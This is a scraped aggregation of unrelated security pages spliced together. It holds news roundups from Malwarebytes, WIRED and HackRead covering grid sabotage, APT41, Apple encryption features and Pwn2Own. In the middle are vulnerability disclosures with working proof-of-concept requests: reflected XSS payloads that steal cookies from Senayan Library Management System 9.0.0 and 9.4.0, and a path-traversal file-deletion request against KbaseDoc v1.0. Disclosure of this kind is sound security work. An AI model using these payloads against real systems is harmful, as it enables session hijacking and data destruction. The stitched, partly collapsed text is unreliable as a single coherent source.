Categories: News
Tags: Lock and Code S03E25

Tags:  lock and code

Tags:  S03E25

Tags:  Dustin Childs

Tags:  Eufy

Tags:  Snapchat

Tags:  Apple

Tags:  Apple AirTag

Tags:  Google Chrome

Tags:  V8 vulnerability

Tags:  Hive

Tags:  Facebook hoax

Tags:  PayPal phish

Tags:  Lazarus Group

Tags:  SIM swapper

Tags:  festive scam

Tags:  holiday scams

Tags:  Android vulnerability

Tags:  Bluetooth

Tags:  SaaS

Tags:  SaaS best practices

Tags:  Epic Games

Tags:  Threat Intelligence Reports

The most interesting security related news from the week of December 5 to 11.



(Read more...)




The post A week in security (December 5 - 11) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (December 5 - 11)

Plus: Chinese hackers stealing US Covid relief funds, a cyberattack on the Met Opera website, and more.

We at WIRED have written plenty about the threat that cyberattacks pose to power grids worldwide. But lately, the most significant attacks on electrical systems have demonstrated that hacking is hardly necessary when physical destruction and sabotage are an option: Just as Russia’s invasion force in Ukraine has systematically destroyed electrical infrastructure to cause vast blackouts across the country, a mysterious and continuing series of physical attacks have hit power utilities in the American southeast—and in one case, have caused an extended outage for tens of thousands of people.

We’ll get to that. In the meantime, though, the cyber news we’ve reported on hasn’t exactly let up this week: Apple added end-to-end encryption for its iCloud backups, while also officially nixing its plan to hunt for child sexual abuse materials in iCloud and reopening a long-running rift with the FBI. Payroll and HR services provider Sequoia admitted to a data breach that included users’ Social Security numbers. A study of cybercrime forums revealed a trend of scammers scamming scammers. And we looked at how the Twitter Files will fuel conspiracy theorists, how technology is contributing to UK authorities creating a “hostile environment” for immigrants, and security and privacy concerns around the Lensa AI portrait app.

But there’s more. Each week, we highlight the security news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories.

When shootings at two electrical substations in North Carolina left 40,000 customers without power for days, the incident seemed like an isolated—if bizarre and troubling—case. But this week, the same utility, Duke Energy, reported gunfire at another facility, a hydroelectric power plant in South Carolina. And combined with two more incidents of hands-on sabotage of US power facilities that occurred in Oregon and Washington in October and November, the vulnerability of the US grid to old-fashioned physical harm has begun to seem like a serious threat.

No damage seems to have occurred in the South Carolina case, and in the earlier incidents in Washington, the utilities involved described the cases as “vandalism.” But the intruders in Oregon carried out a more deliberate attack, cutting through a perimeter fence and damaging equipment, according to the Oregon utility, causing a “brief” power outage in one case. And in yet another, separate collection of incidents, Duke Energy saw half a dozen “intrusions” at substations in Florida, according to documents seen by Newsnation. Federal law enforcement is investigating the cases.

The incidents are reminiscent of another strange, isolated attack on the California power grid in 2015, when a sniper fired on an electrical substation and triggered a blackout to parts of Silicon Valley along with $15 million in damage. These newer cases, while still relatively small in scale, show just how disturbingly vulnerable the American power grid remains to relatively simple forms of sabotage.

The state-sponsored Chinese hacker group APT41 has long carried out a rare mix of cyberespionage and cybercrime. The group, linked in a 2020 US indictment to a company called Chengdu 404 working as a contractor for China’s Ministry of State Security, has been accused of moonlighting as for-profit thieves and even deploying ransomware. Now, NBC News reports that the Secret Service believes APT41 went so far as to steal $20 million from US Covid relief funds—state-sponsored hackers stealing money from the US government itself. About half of the stolen funds were reportedly recovered. But a hacker group on the Chinese government payroll stealing from US federal coffers represents a far more brazen form red-line crossing than even APT41’s previous exploits.

The Met Opera announced earlier this week that it was hit with an ongoing cyberattack that took down its website and online ticketing system. Given that the Met Opera sells $200,000 in tickets a day, the losses from the disruption could do serious harm to one of New York’s major cultural institutions. As of Friday afternoon, the website remained offline, and its administrators had moved ticket sales to a new site. _The New York Times_, in its reporting on the attack, pointed out that the Met Opera had been critical of Russia’s war in Ukraine—going so far as to part ways with its Russian soprano singer—but there’s still no real explanation of the attack.

Cybersecurity firm ESET this week pinned responsibility for a campaign of data-destroying malware attacks targeting the diamond industry on a hacker group it calls Agrius, which has been previously linked to the Iranian government. The attackers hijacked the software updates of an Israeli-made diamond industry software suite to deploy the wiper malware, which ESET calls Fantasy, in March of this year. As a result, it hit targets not only in Israel but others as far-flung as a mining operation in South Africa and a jeweler in Hong Kong. Although Iranian cyberattacks on Israeli targets are certainly nothing new, ESET’s researchers’ writeup doesn’t speculate on the attack’s motivation.

Attackers Keep Targeting the US Electric Grid

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.

****KbaseDoc V1.0 has an arbitrary file deletion vulnerability******Description:**

Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

**Vulnerability analysis:**

Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java 

The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as ../ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.

**Recurrence of vulnerability**

**Download the source code and build the local environment**

Create a poc.txt file in the kbase-doc-master\target\classes directory .

Use burpsuite to construct the following request.

\[+\] POC:

    POST /index/delete HTTP/1.1
    Host: test:8081
    Content-Length: 22
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Connection: close
    
    name=..%2F..%2Fpoc.txt
    
    

It is found that poc.txt is deleted.

**Proof and Exploit:**

href

CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability

Categories: Apple
Categories: Articles
Tags: Apple

Tags:  end-to-end-encryption

Tags:  iMessage Contact Key Verification

Tags:  Security Keys for Apple ID

Tags:  Advanced Data Protection for iCloud

Tags:  EFF

Apple has announced three new security features that will help protect logins, iMessage conversations, and data snyced by iCloud.



(Read more...)




The post Apple announces 3 new security features appeared first on Malwarebytes Labs.

Apple has announced three new security features focused on protecting user data in the cloud: iMessage Contact Key Verification, Security Keys for Apple ID, and Advanced Data Protection for iCloud.

iMessage Contact Key Verification and Security Keys for Apple ID will be available globally in 2023. Advanced Data Protection for iCloud is available in the US today for members of the Apple Beta Software Program, and will be available to US users by the end of the year. The feature will start rolling out to the rest of the world in early 2023.

**3 new features****iMessage Contact Key Verification**

Apple's messaging app, iMessage, already uses end-to-end encryption so that messages can only be read by the sender and recipients. It's new iMessage Contact Key Verification ramps up the protection for "users who face extraordinary digital threats", such as journalists, human rights activists, and politicians.

> Conversations between users who have enabled iMessage Contact Key Verification receive automatic alerts if an exceptionally advanced adversary, such as a state-sponsored attacker, were ever to succeed breaching cloud servers and inserting their own device to eavesdrop on these encrypted communications.

**Security Keys for Apple ID**

In what can be considered another step towards a password-less future, Security Keys for Apple ID will give users the choice to use third-party hardware security keys. A hardware security key uses public-key encryption to authenticate a user, and is much harder to defeat than other forms of authentication, such as passwords, or codes sent by SMS or generated by apps.

For users who opt in, Security Keys strengthen Apple’s two-factor authentication by requiring a hardware security key as one of the two factors.

This new Apple ID support for physical authentication keys is another feature long-sought by users and announced months ago in cooperation with Google and Microsoft.

**Advanced Data Protection for iCloud**

Advanced Data Protection for iCloud is end-to-end encyption for data that is synced between devices via iCloud. Encrypted data is only decrypted on your devices, so it would not be exposed in the event of an iCloud data breach.

It isn't new, nor is it complete, but it now covers more kinds of data. Until now, iCloud protected 14 different data categories in this way, including passwords in iCloud Keychain, and Health data. For those users that choose to enable Advanced Data Protection, this will rise to 23, including iCloud Backup, Notes, and Photos.

Apple notes that Mail, Contacts, and Calendar are not covered because of interoperability issues with global systems that would arise.

> Advanced Data Protection is Apple’s highest level of cloud data security, giving users the choice to protect the vast majority of their most sensitive iCloud data with end-to-end encryption so that it can only be decrypted on their trusted devices.

The most important part of this new protection are iCloud backups, which are basically a copy of everything on your device. So far, these backups weren’t end-to-end encrypted. Which meant, for example, that Apple could access the data and share it with other entities, like law enforcement.

**EFF reaction**

The Electronic Frontier Foundation (EFF), which has been campaigning for this option, seems pleased. It applauds Apple for listening to experts, child advocates, and users who want to protect their most sensitive data. They point out that user data will be protected even if there is a data breach in the cloud, a government demand, or a breach from within Apple (such as a rogue employee).

> The ability to opt-in to encrypted iCloud backups is a really big win for users and bad news for law enforcement, who loved to request iCloud backups to save them the trouble of breaking into a phone.
> 
> — Eva (@evacide) December 7, 2022

Malwarebytes’ Director of Core Technology, and authority on everything Apple, Thomas Reed is equally happy with the new features. Although he fears that the use of hardware keys as a new option for MFA, is not something the average user will ever appreciate. He’s really happy with the Advanced Data Protection feature.

> I've never been comfortable with putting my iPhone backups in iCloud, for example, but with this change I may start doing so.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Apple announces 3 new security features

By Habiba Rashid
Here is everything you need to know about the first two days at the Pwn2Own hacking contest.
This is a post from HackRead.com Read the original post: Pwn2Own Day 1 and 2: Samsung, HP, MikroTik & Netgear Pwned

Being held at Zero Day Initiative (ZDI)’s Toronto office, this year’s **Pwn2Own** kicked off smoothly on 6th December 2022 with contestants participating both in person and remotely. Before we dive into the proceedings on the event days, let’s talk about what Pwn2Own is and how it started. 

**What is Pwn2Own?**

Pwn2Own is a hacking contest where security researchers are invited to hack into devices that IT hardware and software manufacturers believe are secure.

At Pwn2Own Toronto 2022, contestants would have targets such as mobile phones, wireless routers, home automation hubs, printers, smart speakers, and NAS devices for hacking into.

For their efforts resulting in a successful hack, the participants are rewarded with prize money. 

Starting in April 2007 during the CanSecWest conference in Vancouver, Pwn2Own has come a long way to become the highly reputable competition that it is. It began when security researcher Dragos Ruiu wanted to put Apple’s impenetrable security system to the test and ever since, the competition has followed a similar mission statement.

Not only has it allowed organizations to normalize bug reporting but has also changed how the industry looks at security. 

This fall’s Pwn2Own event introduced a new category called “SOHO Smashup” (Small Office/Home Office) to incorporate a real-world setting where a threat actor would exploit a home office.

A contestant would be required to pick a router and begin exploiting the WAN interface and then they would pivot to the LAN, where a second device is hacked such as a NAS appliance, a smart speaker, or a printer. 

**DAY 1 PROCEEDINGS**

The **first day** of the competition welcomed participants who won a total of $400,000 for exploits targeting phones, printers, routers, and NAS devices. 

The Devcore team which is a recurring contestant in the competition won the highest single reward of $100,000 in the SOHO Smashup category for hacking a MikroTik router and a Canon printer connected to it. 

Coming in second with a reward of $50,000 was the team Neodyme which successfully hacked a Netgear router and an HP printer.

Meanwhile, the Star Labs team also earned $50,000 for hacking a Samsung Galaxy S22 smartphone. The same device was also hacked by a participant named Chim who earned $25,000. 

Researchers at industrial and IoT cybersecurity firm Claroty earned $40,000 for hacking a Synology DiskStation NAS device.

There were also multiple $20,000 rewards for hacking Canon, HP, Lexmark printers, TP-Link, and Synology routers. Two teams earned $10,000 each for Synology NAS and HP printer hacks.

Excluding the SOHO Smashup entry, Netgear router exploits earned smaller rewards. The Netgear exploits by some contestants including Tenable were neutralized just days before the competition due to a last-minute hotfix released by the vendor.

